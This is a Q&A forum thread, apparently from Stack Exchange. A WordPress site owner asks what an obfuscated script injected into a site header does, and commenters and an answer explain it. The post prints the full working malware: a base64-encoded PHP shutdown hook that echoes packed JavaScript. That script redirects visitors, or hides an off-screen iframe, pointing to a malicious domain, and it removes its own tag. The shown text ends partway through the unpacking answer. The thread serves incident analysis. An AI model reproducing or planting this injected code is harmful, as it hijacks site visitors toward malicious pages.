# Suspicious JavaScript in website header

Tags: javascript, virus, wordpress, code-review

I am not sure if this is the correct place to ask a questions such as this, apologies if it isn't.

I have found the below code in the header of one of my wordPress websites, I am pretty sure it is malicious and I have removed it. However I am curious and I can't work out what is purpose is.

Is anyone able to provide any ideas?

**Base 64 Encoded:**

```
CmZ1bmN0aW9uIHVzZXJfYWJvcnRfZW5kX2V4aXRfb3BlcmF0aW9uaWRfODgwNzkwNigpCnsKICAgIGVjaG8gYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0IwZVhCbFBTSjBaWGgwTDJwaGRtRnpZM0pwY0hRaUlHbGtQU0pwWkY4NE9EQTNPVEEySWo1bGRtRnNLR1oxYm1OMGFXOXVLSEFzWVN4akxHc3NaU3hrS1h0bFBXWjFibU4wYVc5dUtHTXBlM0psZEhWeWJpaGpQR0UvSnljNlpTaHdZWEp6WlVsdWRDaGpMMkVwS1NrcktDaGpQV01sWVNrK016VS9VM1J5YVc1bkxtWnliMjFEYUdGeVEyOWtaU2hqS3pJNUtUcGpMblJ2VTNSeWFXNW5LRE0yS1NsOU8ybG1LQ0VuSnk1eVpYQnNZV05sS0M5ZUx5eFRkSEpwYm1jcEtYdDNhR2xzWlNoakxTMHBlMlJiWlNoaktWMDlhMXRqWFh4OFpTaGpLWDFyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z1pGdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLWHRwWmloclcyTmRLWHR3UFhBdWNtVndiR0ZqWlNodVpYY2dVbVZuUlhod0tDZGNYR0luSzJVb1l5a3JKMXhjWWljc0oyY25LU3hyVzJOZEtYMTljbVYwZFhKdUlIQjlLQ2R4SURGMFBUTjRLRW9vS1h0bUtHb3VUU0U5TVVrbUprd2dhaTVOSVQwaVN5SXBlek41S0RGMEtUdG1LRXdnUVZzaU1VRWlYVDA5SWtzaUtYdEJXeUl4UVNKZFBURTdjU0F4Tnowb01UWW9LU1ltTVZJb0tTazdjU0F4VkQwaE1UY21KaUVoUVM0emVpWW1RUzVGTGpOM1BUMDlJak4ySUROeUxpSTdjU0F4YWowdE1UdHhJRWM5SWpOek9pOHZNM1F1TTNVdk0wRWlPMllvVnlncEppWXhhajA5TVNsN1ppZ29SUzVPTGpGdktDOHpRaTlwS1NsOGZDaEZMazR1TVc4b0x6TklMMmtwS1NsN01Ua3VNMGtvUnlsOWVudEJMakU1UFVjN2FpNHhPVDFIZlgxNmUyWW9LREUzSmlZaE1WUW1KaUZYS0NrcEtYdHhJRk05SWp3eE1TQXpTajFjWENJelJ6b3pSanN6UXpvdE0wUTdYRndpUGp3eGVTQXpSVDFjWENJeGJGeGNJaUF6Y1QxY1hDSWlLMGNySWx4Y0lpQXpjRDFjWENJeGJGeGNJajQ4THpGNVBqd3ZNVEUrSWp0eElFazlhaTR6WWlnaU1URWlLVHRtS0VrdU1XMDlQVEFwZTJvdVRTNVFQV291VFM1UUsxTjllbnR4SURGT1BVa3VNVzA3Y1NCU1BUTmpMak5rS0NneFRpOHlLU2s3U1Z0U1hTNVFQVWxiVWwwdVVDdFRmWDE5ZlRGTktDbDlmU3d6WVNrN1NpQXhUU2dwZTNFZ1ZUMGlNemtpTzJZb1ZTRTlJak0xSWlsN2NTQklQV291TXpZb1ZTazdaaWhNSUVnaFBVc21Ka2doUFRGSktYdElMak0zUFNJaU96TTRJRWg5ZlgwN1NpQXhVaWdwZTJZb2FpNUVKaVloYWk0elpTbDdlQ0JDZlhvZ1ppaHFMa1FtSmlGQkxqTm1LWHQ0SUVKOWVpQm1LR291UkNZbUlXb3VNMjBwZTNnZ1FuMTZJR1lvYWk1RUppWWhhaTR6YmlsN2VDQkNmWG9nWmlocUxrUW1KaUZCTGpOdktYdDRJRUo5ZWlCbUtHb3VSQ2w3ZUNCQ2ZYb2daaWhNSUVVdU0yd2hQU0pMSWlZbUlXb3VSQ1ltTVRZb0tTbDdlQ0JDZlhwN2VDQXhZbjE5U2lBeE5pZ3BlM0VnZVQxQkxrVXVUanR4SUZFOWVTNURLQ0l6YXlBaUtUdG1LRkUrTUNsN2VDQmFLSGt1V1NoUkt6VXNlUzVES0NJdUlpeFJLU2tzTVRBcGZYRWdNV3M5ZVM1REtDSXpaeThpS1R0bUtERnJQakFwZTNFZ01UUTllUzVES0NJemFEb2lLVHQ0SUZvb2VTNVpLREUwS3pNc2VTNURLQ0l1SWl3eE5Da3BMREV3S1gxeElFODllUzVES0NJemFTOGlLVHRtS0U4K01DbDdlQ0JhS0hrdVdTaFBLelVzZVM1REtDSXVJaXhQS1Nrc01UQXBmWGdnTVdKOVNpQlhLQ2w3Y1NBeFlUMUJMa1V1VGk0emFpZ3BPMllvTHlnelMzd3pURnhjWkN0OE5HZ3BMaXN4YUh3MGFYdzBhbHhjTDN3MFozdzBabncwWW53MFkzdzBaSHd6Tkh3MGEzd3hkU2cwYkh3eFpDbDhNWEo4TkhKOE5ITWdmRFIwZkRSeGZEUndmREZvTGlzMGJYdzBibncwYnlCdEtEUmhmRFE0S1dsOE0xTW9JREZQS1Q5OE0xUjhjQ2d6Vlh3elVpbGNYQzk4TTFGOE0wMThNMDU4TTA4b05IdzJLVEI4TTFCOE0xWjhNVWhjWEM0b00xZDhORE1wZkRRMGZEUTJmRFF5SURReGZETllmRE5aTDJrdU1VTW9NV0VwZkh3dk0xcDhOSFY4TWt0OE1tWjhNbUY4TlRCYk1TMDJYV2w4TWpoOE1WWjhZU0F4VUh3eFdId3hkeWd4VVh3eGVIeHpYRnd0S1h3eFV5Z3lZbnd5YXlsOE1XY29NbTE4TVc1OE1YWXBmREp1ZkRKa0tESmxmRlo4TW1NcGZESnBmREZtS0RKc2ZERmpLWHd4V2loVWZESnZLWHd4VjN3eFdTZ3ljSHhjWEMxdGZISWdmSE1nS1h3eWNYd3laeWd4Vlh3eGNId3lhQ2w4TVVJb01tcDhNaklwZkRJektERjNmREk1S1h3eU55aGxmSFlwZDN3eU5ud3lORnhjTFNodWZIVXBmREkxWEZ3dmZETXpmREpSZkRKU1hGd3RmREpRZkRKUGZESk1mREpOWEZ3dGZERjJLREpPZkRGRktYd3lXbnd5VmlneFpYd3hjSHd5V0NsOE1uaDhNbmxjWEMxemZESjZmREozZkRKMmZERnBLR044Y0NsdmZESnpLREV5ZkZ4Y0xXUXBmREoxS0RRNWZERlRLWHd5UWlneVNId3lTU2w4TVZFb01rUjhNa1VwZkRKRGZESkdLRnMwTFRkZE1Id3hUM3d4VUh3eVJ5bDhNa0Y4TW5Rb1hGd3RmREZ4S1h3eFRDQjFmREpLZkRKWGZESlpYRnd0Tlh4blhGd3RNVFY4TVdNb1hGd3VkM3d4WkNsOE16RW9NekI4TWxVcGZESnlmREpVZkRKVFhGd3RLRzE4Y0h4MEtYdzBaVnhjTFh3MFJDZ3hSM3d4UmlsOE5tMG9JR2w4TVhVcGZEWnVYRnd0WTN3MmJ5aGpLRnhjTFh3Z2ZERnhmR0Y4WjN4d2ZITjhkQ2w4Tm1zcGZEWm9LRFpwZkRacUtYeHBYRnd0S0RJd2ZERmpmRmdwZkRaeGZEUjJLQ0I4WEZ3dGZGeGNMeWw4Tm5kOE5uaDhObmw4Tm5aOE5uVjhObko4Tm5OOE1YSjhOblFvZEh4MktXRjhObWQ4Tm1aOE5qSjhOak44TmpSOE5Wb29JSHhjWEM4cGZEVlZmRFZXSUh3MVYxeGNMWHcxV0NoamZHc3BmRFkxS0RZMmZEWmpLWHcyWkNnZ1ozeGNYQzhvYTN4c2ZIVXBmRFV3ZkRVMGZGeGNMVnRoTFhkZEtYdzJPSHcyT1h3MmVseGNMWGQ4TnpKOE56TmNYQzk4V0NoVWZEYzBmRGN4S1h3eGVpaEdmREl4ZkRGdUtYeHRYRnd0TmxwOE5sY29ObGg4TVVRcGZEYzFLRGMyZkRkamZERktLWHczWlh3eE5TaEdmRGRrZkRGQ2ZEZGlmREZwZkhRb1hGd3RmQ0I4YjN4MktYdzNOeWw4Tnpnb05UQjhObFY4ZGlBcGZEWlVmRFpIZkRaSVd6QXRNbDE4TmtsYk1pMHpYWHcyUmlnd2ZESXBmRFpGS0RCOE1udzFLWHcyUWlnd0tEQjhNU2w4TVRBcGZEWkRLQ2hqZkcwcFhGd3RmRFpFZkRaS2ZEWkxmRFpSZkRaU0tYdzJVeWcyZkdrcGZEWlBmRFpNZkRaTktEWk9mRFZVS1h3MVUzdzBWM3cwV0h3MFdTaGhmR1I4ZENsOE5GVjhORklvTVROOFhGd3RLRnN4TFRoZGZHTXBLWHcwV253MU1Yd3hTeWcxWVh3MVlpbDhOV05jWEMweWZEVTVLREZWZkRVNGZERnpLWHcxTlh3MU5ud3hSMXhjTFdkOE5UZGNYQzFoZkRSUUtEUkRmREV5ZkRJeGZETXlmRFl3ZkZ4Y0xWc3lMVGRkZkdsY1hDMHBmRFI0ZkRSNWZEUjZmRFJHZkRSSGZEUk5LRFJPZkRSUEtYdzBURnhjTDN3MFN5ZzBTSHhZZkRSSmZEUktmRlo4TldRcGZEVmxLRVo4YUZ4Y0xYd3hlSHh3WEZ3dEtYdzFSMXhjTDN3eGN5aGpLRnhjTFh3d2ZERXBmRFEzZkRGNmZERkZmREZFS1h3MVFWeGNMWHcxUW53MVF5aGNYQzE4YlNsOE5VbGNYQzB3ZkRWS0tEUTFmRFZSS1h3MVVpZ3haM3d4Wm53MVQzd3haWHcxVGlsOE5Vc29OVXg4VmlsOE5VMG9SbnhvWEZ3dGZIWmNYQzE4ZGlBcGZEVjVLRVo4Tld3cGZEVnRLREU0ZkRVd0tYdzFiaWcxYTN3eE1Id3hPQ2w4TVVZb05XZDhOV2dwZkRWcFhGd3RmRFZ2WEZ3dGZEVndLR2w4YlNsOE5YWmNYQzE4ZEZ4Y0xURTFmRFY0S0RGTGZEVjFLWHd4U2lnM01IeHRYRnd0ZkRWeGZEVnlLWHcxYzF4Y0xUbDhNVWdvWEZ3dVlud3hUSHcxZWlsOE5WQjhOVVI4TlVWOE5GWjhObVVvTm5COFZDbDhObXdvTkRCOE5Wc3dMVE5kZkZ4Y0xYWXBmRFYwZkRWM2ZEVm1mRFZxS0RVeWZEVXpmRFl3ZkRZeGZEY3dmRFZJZkRWR2ZEUjNmRFJCZkRSQ0tYdzBSU2hjWEMxOElDbDhORkY4TkZSOE5GTW9aeUI4TmxCOE56a3BmRGRoZkRaWmZEWldmRFpCWEZ3dGZEWTNmRFpoZkRaaVhGd3RMMmt1TVVNb01XRXVOVmtvTUN3MEtTa3BlM2dnUW4xNElERmlmU2NzTmpJc05EUTVMQ2Q4Zkh4OGZIeDhmSHg4Zkh4OGZIeHBabng4Zkh4a2IyTjFiV1Z1ZEh4OGZIeDhmSHgyWVhKOGZIeDhmSHg4Y21WMGRYSnVmSHBDYmtkalVrdHVWV3RuVjJWeFIxTnpSVUZ3VTI1NGRFNXBUVmh4Wm10SGVWbDhaV3h6Wlh4M2FXNWtiM2Q4ZEhKMVpYeHBibVJsZUU5bWZHRnNiSHh1WVhacFoyRjBiM0o4TURGOFdHWllhRVZRU205RWNXbDVabVZTYW0xaVlXNTZVVzVHU2tKdFEwNVRaV1pJWTIxNmNteDhXbXRIU1VSWlExSlhXWGxwU2xsUFZVcEtZM0p1U0VoalMySm9UMXB4VGtGclMwcEVmR3hTWVVabVMwMXFaV2hCY1hGWlZtcFhURnBaVjJGNVdGRndSbUpuU0V4TVZYVnVZM3htZFc1amRHbHZibngxYm1SbFptbHVaV1I4ZEhsd1pXOW1mR0p2WkhsOGRYTmxja0ZuWlc1MGZGSkZWa3hIY1dad2RXNWxkV0ZoU2tWWVNGTkhjRmR1VVdwYVlWcFdVMnRHZkdsdWJtVnlTRlJOVEh4VVFXSnBURk5aVm5aMVRuZEphV2xZZDJsSlVXNW1URU40WVVKRGNuTnZkVk40Y2xOMVNIeHRTazl6UldsYVluVlJhR2xKVkhOWGNGRmFXRWRhWVZKNlZteFFkR3RUVWtaNFRIUm1SM2w4UkdWelZYRjFTMUZLWjBKYWFtOXpVMGhRVjJOU1ZtZDZlVzFoVjNkeVJVbHRWbWw0YjBoMGZIUmxmSFpuV25aNWFrTmtla1JYZDBKMVpFaEZhM1JDYm1GaFoxbFpXV0p1V25oQ2ZHNTVmRXhEU0hGVFNsaG9TWGwxWkhKWGVtOWlTa1JUUTI5WloyZEdjV0ZQU25WU2FXTlBiM3h0WVh4emRXSnpkSEpwYm1kOGNHRnljMlZKYm5SOGZHUnBkbng4ZkVGemFtSm9TMDlzVEZCclJVcHJhWEZuZVVGRlRteEtaMEoxZG5aMVJGRkJmRzF2ZkVweFJrOVhaVWRLVm1wbmJHZFlTbWRpYlZkTlQwOW5jbnBQYW0xNWQwRjViM3hEWVVWYWNraGFjRnBZWjNOUlJsVkVkMU5hVjNKaFQyeG9Za0p5Ukc5QmQzbHRmSHhzYjJOaGRHbHZibnh3UzBwUmRFNTNaRzlDV2twT2NHcDVZMGxZVjI5VmNHdGxhV1pWU1hKYWJFVjhabUZzYzJWOFoyOThiMlI4YVhSOFlYSjhZV3g4Ylc5aWFXeGxmR1J2ZkZwTWRXaHZXSHBrWkdOU1VrcEdjMXBKZEVwS1pITnBTRmxIUjI5QlZWUjhablp4YW1KelRVeGFkMUZvYWtadFdubDNaa3B3VUVwQ2RtRlpUazVRUVdKclRYd3lNWEI0Zkd4bGJtZDBhSHhqWVh4dFlYUmphSHhzYkh4ZmZHbHlhWE44YzJWOGFuaFFiMmRNY205bFdGRjJjRmhyYldkMWJHcGFiMGRUVG01SlVVdFJWWFI4YVhCOFkyOThZV044YjI5OGFXWnlZVzFsZkcxamZIWmZZbVEyTm1Jek1tVXhZbU0yWVdRNU1XVXdNVE14T0dVNE1qYzRPVEU0WmpCOFltbDhkR1Z6ZEh4eWFYeHVaSHgwWVh4d2RIeDFjSHh1ZFd4c2ZIUnpmSEJzZkdjeGZIQkpiMjlLZFhOclNITlRTbTV1V0dkbWFWWkZkbk5HY1hGamNWaFJVV3B2ZkdSc1gyNWhiV1Y4YjNOOGQyRjhaWEo4YVZGRWFsTnlWV0YyUkdoellWcHdRVWRCWkhCMWFXTk9TV2wwUVZGamMzZDBRVmg4WVdsOGJtWjRhVXRtWm5sUmFrVklTV2xtV2tKT1NXWmFVSGwyZFZaQlMxaFJRVmRsYWt0NFptdG1aV2g4WTJ0OE9EQXljM3hoZEhSM2ZHRmlZV044WVhWOFlYTjhmSHh5Wkh4aWJIeGlkM3hqTlRWOFluVnRZbnhpY253M056QnpmR0Y2ZkRSMGFIQjhhMjk4ZVhkOFlXNThaWGg4TTJkemIzeGlaWHh1Y1h4aGNIUjFmR3hpZkhKdWZHTm9mR0YyZkdGdGIybDhkWE44WkdsOFlYWmhibnhvWVdsbGZHUnpmR1pzZVh4bGJIeGtiVzlpZkdScFkyRjhaR0owWlh4a1kzeGtaWFpwZkdabGRHTjhaVzE4WlhOc09IeHBZM3hyTUh4bGVueDZaWHhzTW54MWJIeG5OVFl3ZkRZMU9UQjhZMnhrWTN4amJXUjhiWEI4WTJoMGJYeGpaV3hzZkdOamQyRjhZMlJ0Zkdoa2ZHaGphWFI4ZFc1OFpHRjhaMlZ1Wlh4dVozeG5abnhqY21GM2ZHRmtmR2R5Zkh4allYQnBmR2hwY0hSdmNIeHViMjVsZkdkbGRFVnNaVzFsYm5SQ2VVbGtmRzkxZEdWeVNGUk5USHhrWld4bGRHVjhhV1JmT0Rnd056a3dObnd4TURCOFoyVjBSV3hsYldWdWRITkNlVlJoWjA1aGJXVjhUV0YwYUh4bWJHOXZjbnhqYjIxd1lYUk5iMlJsZkZoTlRFaDBkSEJTWlhGMVpYTjBmRlJ5YVdSbGJuUjhjblo4UldSblpYeDBiMHh2ZDJWeVEyRnpaWHhOVTBsRmZHMWhlRlJ2ZFdOb1VHOXBiblJ6ZkhGMVpYSjVVMlZzWldOMGIzSjhZV1JrUlhabGJuUk1hWE4wWlc1bGNueGhkRzlpZkdobGFXZG9kSHh6Y21OOFNXNWpmR2gwZEhCOGJXbDNhMkYyYjNKcGQydGhmRzFzZkVkdmIyZHNaWHgyWlc1a2IzSjhjMlYwU1c1MFpYSjJZV3g4WTJ4bFlYSkpiblJsY25aaGJIeGphSEp2YldWOE1EVXlSbnhwVUdodmJtVjhiR1ZtZEh3eU5qTXdjSGg4ZDJsa2RHaDhZV0p6YjJ4MWRHVjhjRzl6YVhScGIyNThhVkJ2Wkh4eVpYQnNZV05sZkhOMGVXeGxmR0Z1WkhKdmFXUjhZbUo4Y0c5amEyVjBmSEJ6Y0h4elpYSnBaWE44YzNsdFltbGhibnh3YkhWamEyVnlmSEpsZkhCaGJHMThjR2h2Ym1WOGFYaHBmSFJ5Wlc5OFluSnZkM05sY254NFpHRjhlR2xwYm05OE1USXdOM3g4WTJWOGQybHVaRzkzYzN4c2FXNXJmSFp2WkdGbWIyNWxmSHgzWVhCOGZHbHVmSHh2WW54amIyMXdZV3g4Wld4aGFXNWxmR1psYm01bFkzeG9aV2w4WW14aGVtVnlmR0pzWVdOclltVnljbmw4YldWbFoyOThZWFpoYm5SbmIzeGlZV1JoZkdsbGJXOWlhV3hsZkdodmJtVjhabWx5WldadmVIeHVaWFJtY205dWRIeHZjR1Z5WVh4dGJYQjhiV2xrY0h4cmFXNWtiR1Y4YkdkbGZHMWhaVzF2ZkRZek1UQjhhV0ZqZkRnemZIRjBaV3Q4Y2pNNE1IeHlOakF3ZkRnMWZEazRmREEzZkdocGZIY3pZM3h5WVd0emZISnBiVGw4WjJWOGJXMThiWE44YzJGOGN6VTFmSEp2ZkhabGZIcHZmSEZqZkhkbFltTjhjR2Q4ZDJsOGQyaHBkSHh3WkhobmZIWmxjbWw4YjNkbk1YeHdPREF3ZkhCaGJueHdhR2xzZkh4d2FYSmxmSHg4ZkhCeWIzaDhjSE5wYjN4eFlYeHlkSHh3YjN4aGVYeDFZM3h3Ym54MllYeHpZM3gyZFd4amZHZDBmR3hyZkhSamJIeDJlSHd3TUh4dFlueDBNbngwTm54MFpHZDhkR1ZzZkcwemZHMDFmSFI0ZkhadE5EQjhjMmg4ZEdsdGZIWnZaR0Y4ZEc5OGMzbDhjMmw4YzJkb2ZITm9ZWEo4YzJsbGZIWTBNREI4ZGpjMU1IdzRNWHh6Wkd0OE9EQjhjMnQ4YzJ4OGMyOThablI4YzNCOGREVjhZak44ZFhSemRIeHBaSHh6Ylh4dmNtRnVmSGQyZkd0c2IyNThhM0IwZkd0M1kzeHJlVzk4YzNWaWMzUnlmR3RuZEh4OGZHcHBaM044YTJSa2FYeHJaV3BwZkd4bGZHNXZmSGx2ZFhKOGJHbGlkM3hzZVc1NGZIcGxkRzk4ZW5SbGZIaHBmR3huZkhacGZHcGxiWFY4YW1KeWIzeG9kWHhoZDN4MFkzeDBjSHgyYTN4b2NIeG9jM3hvZEh4eVozeHBNak13ZkdsdWJtOThhWEJoY1h4cVlYeHBiVEZyZkdscmIyMThhV0p5YjN4cFpHVmhmR2xuTURGOGJURjhlV0Z6Zkc0M2ZHNWxmRzl1Zkc0MU1IeHVNekI4YlhsM1lYeHVNVEI4YmpJd2ZIUm1mSGRtZkc4eWFXMThiM0I4ZEdsOGJucHdhSHh1WTN4M1ozeDNkSHh1YjJ0OGJYZGljSHh3TVh4NE56QXdmRzFsZkhKamZIZHZiblY4WTNKOGZIaHZmRzB6WjJGOGJUVXdmSFZwZkcxcGZHODRmSHA2ZkcxMGZHNTNmSGR0YkdKOFpHVjhiMkY4TURKOGJXMWxaaWN1YzNCc2FYUW9KM3duS1N3d0xIdDlLU2tLUEM5elkzSnBjSFErJyk7Cn0KCnJlZ2lzdGVyX3NodXRkb3duX2Z1bmN0aW9uKCd1c2VyX2Fib3J0X2VuZF9leGl0X29wZXJhdGlvbmlkXzg4MDc5MDYnKTsKCg==
```

**Actual Code:**

```
<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\\"3G:3F;3C:-3D;\\"><1y 3E=\\"1l\\" 3q=\\""+G+"\\" 3p=\\"1l\\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\\d+|4h).+1h|4i|4j\\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\\-(n|u)|25\\/|33|2Q|2R\\-|2P|2O|2L|2M\\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\\-s|2z|2w|2v|1i(c|p)o|2s(12|\\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\\-|1q)|1L u|2J|2W|2Y\\-5|g\\-15|1c(\\.w|1d)|31(30|2U)|2r|2T|2S\\-(m|p|t)|4e\\-|4D(1G|1F)|6m( i|1u)|6n\\-c|6o(c(\\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\\-(20|1c|X)|6q|4v( |\\-|\\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\\/)|5U|5V |5W\\-|5X(c|k)|65(66|6c)|6d( g|\\/(k|l|u)|50|54|\\-[a-w])|68|69|6z\\-w|72|73\\/|X(T|74|71)|1z(F|21|1n)|m\\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\\-| |o|v)|77)|78(50|6U|v )|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\\-2|59(1U|58|1s)|55|56|1G\\-g|57\\-a|4P(4C|12|21|32|60|\\-[2-7]|i\\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\\-|1x|p\\-)|5G\\/|1s(c(\\-|0|1)|47|1z|1E|1D)|5A\\-|5B|5C(\\-|m)|5I\\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\\-|v\\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\\-|5o\\-|5p(i|m)|5v\\-|t\\-15|5x(1K|5u)|1J(70|m\\-|5q|5r)|5s\\-9|1H(\\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\\-|67|6a|6b\\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2|ul|g560|6590|cldc|cmd|mp|chtm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|android|bb|pocket|psp|series|symbian|plucker|re|palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
```

Comment: Probably related to "packed" http://stackoverflow.com/questions/21423397/what-does-the-custom-functionp-a-c-k-e-d-used-for

Comment: Thanks, I just used http://dean.edwards.name/unpacker/ to unpack it. Seems to be redirecting or opening a window to http://miwkavoriwka.ml/052F based on device type

Comment: Yes, you've been hacked.  You really should get WordFence, a security plugin.  I run a few different blogs that come under attack from time to time, and WordFence does an excellent job of keeping bad actors out and alerting you if anything suspicious does get into your site.

Answer (score 21, accepted):

It seems that the "actual code" you posted is packed using http://matthewfl.com/unPacker.html. When you unpacked it you obtain

```
var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
